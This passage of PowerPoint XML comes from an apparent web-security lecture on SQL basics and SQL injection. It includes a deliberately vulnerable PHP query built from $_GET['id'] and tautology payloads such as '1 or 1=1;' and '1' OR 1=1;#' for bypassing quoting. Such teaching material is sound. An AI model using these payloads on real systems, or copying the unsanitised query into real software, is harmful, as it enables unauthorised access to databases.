              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> can either be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>List of comma-separated column names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>“*” for all columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a comma-separated list of tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a Boolean SQL expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single quotes for strings (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Integers are specified in the normal way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single line: ‘--’ (two dashes) character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Multi-line: “/*” and “*/” (like C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Server-specific, e.g., “#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambri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9600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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4800" y="2057400"/>
            <a:ext cx="8458200" cy="6858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Returns all rows from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> columns where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242144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021" y="5029200"/>
            <a:ext cx="911250" cy="12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70" y="1941128"/>
            <a:ext cx="2182611" cy="12704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656391" y="2332240"/>
            <a:ext cx="383121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459195" y="3810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924800" y="3810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340" name="Picture 4" descr="http://i.i.cbsi.com/cnwk.1d/i/tim/2011/03/16/Chrome-logo-2011-03-1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6875" l="260" r="98182">
                        <a14:foregroundMark x1="51948" y1="48177" x2="51948" y2="48177"/>
                        <a14:foregroundMark x1="43117" y1="41667" x2="64935" y2="52344"/>
                        <a14:foregroundMark x1="38961" y1="54688" x2="58442" y2="60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383" y="2833563"/>
            <a:ext cx="1066800" cy="106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424300" y="1916668"/>
            <a:ext cx="428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subdomain.mysite.com/folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>page?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Microsoft SQL Serv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973" y="4907543"/>
            <a:ext cx="1682246" cy="138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http://www.geekpeek.net/wp-content/uploads/2013/07/Apache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973" y="2685357"/>
            <a:ext cx="1850017" cy="127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5600" y="1424221"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14346" name="Picture 10" descr="http://www.planet-source-code.com/vb/2010Redesign/images/LangugeHomePages/PHP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106" y="3773258"/>
            <a:ext cx="1086267" cy="57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788685" y="4194188"/>
            <a:ext cx="19046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Database Queries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33884" y="2362200"/>
            <a:ext cx="389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 Page, JS file, CSS file, image, etc.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590800" y="2743200"/>
            <a:ext cx="383121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1349" y="4421966"/>
            <a:ext cx="4090084" cy="147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GET Requests: Used for requests for pages, resources, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST Requests: Used for form submissions, logins,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43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099818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200"/>
          <a:ext cx="4041204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72862"/>
                <a:gridCol w="1463062"/>
                <a:gridCol w="1605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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> is silly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19022" y="4953000"/>
            <a:ext cx="1654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comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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04800" y="3124200"/>
            <a:ext cx="3886200" cy="10668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/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 2; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4267200"/>
            <a:ext cx="381000" cy="457200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4953000"/>
            <a:ext cx="3733800" cy="1219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2, 2, “I like sugar”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2, 3, “But not milk”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9600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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3567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322955"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="3403600"/>
          <a:ext cx="4558759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72862"/>
                <a:gridCol w="1463062"/>
                <a:gridCol w="21228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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> is silly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267447" y="2286001"/>
            <a:ext cx="3466353" cy="304353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200" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>users.first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>comments.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> from users, comments where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/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>comments.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> = 2;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5492377"/>
            <a:ext cx="3733800" cy="1219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</a:rPr>
              <a:t>Gordon“I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like sugar”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gordon“But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> not milk”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9600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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824763"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="2133600"/>
          <a:ext cx="5163581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72862"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1233904"/>
                <a:gridCol w="101256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Gordon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gordonb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ounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5329535"/>
            <a:ext cx="3124200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86687"/>
              <a:gd name="adj2" fmla="val -158290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Join two tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380012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Tautologies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050672"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200"/>
          <a:ext cx="4041204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72862"/>
                <a:gridCol w="1463062"/>
                <a:gridCol w="1605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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> is silly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19022" y="4953000"/>
            <a:ext cx="1654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comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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04800" y="2514600"/>
            <a:ext cx="3886200" cy="17526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/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>OR 1= 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>; 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304800" y="4343400"/>
            <a:ext cx="3733800" cy="2438400"/>
            <a:chOff x="304800" y="4343400"/>
            <a:chExt cx="3733800" cy="2438400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Down Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="4343400"/>
              <a:ext cx="381000" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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4800" y="4876800"/>
              <a:ext cx="3733800" cy="1905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</a:rPr>
                <a:t>1, 1, “Test Comment”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2, 2, “I like sugar”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2, 3, “But not milk”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3, 4, “Gordon is silly”</a:t>
              </a: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609600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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24400" y="5638800"/>
            <a:ext cx="3276600" cy="854075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Tautologies often used in real attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2181368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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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$id"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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28600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Guess as to the exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277829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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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$id"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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167406" y="3910106"/>
            <a:ext cx="3238500" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391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Solution: 1 or 1=1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2012-07-02 at 2.33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2286000"/>
            <a:ext cx="41021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37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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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28600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Does quoting make it safe?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881094" y="4572000"/>
            <a:ext cx="6805706" cy="152400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Hint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified: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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single line: ‘--’ (two dashes) character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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Multi-line: “/*” and “*/” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:cs typeface="Cambria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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"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00928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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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572000" y="3657600"/>
            <a:ext cx="3833906" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391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1’ OR 1=1;#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2012-07-02 at 2.35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000"/>
            <a:ext cx="34417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92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worse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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
